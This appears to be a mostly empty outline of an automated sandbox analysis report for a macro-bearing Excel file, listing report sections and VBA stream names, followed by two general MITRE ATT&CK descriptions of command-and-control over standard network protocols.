Analysis Report Mcg4yE0diN.xls

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Mcg4yE0diN.xls"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 921

General

VBA Code Keywords

VBA Code

VBA File Name: Sheet1.cls, Stream Size: 977

General

VBA Code Keywords

VBA Code

VBA File Name: Sheet2.cls, Stream Size: 977

General

VBA Code Keywords

VBA Code

VBA File Name: Sheet3.cls, Stream Size: 977

General

VBA Code Keywords

Description:	Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre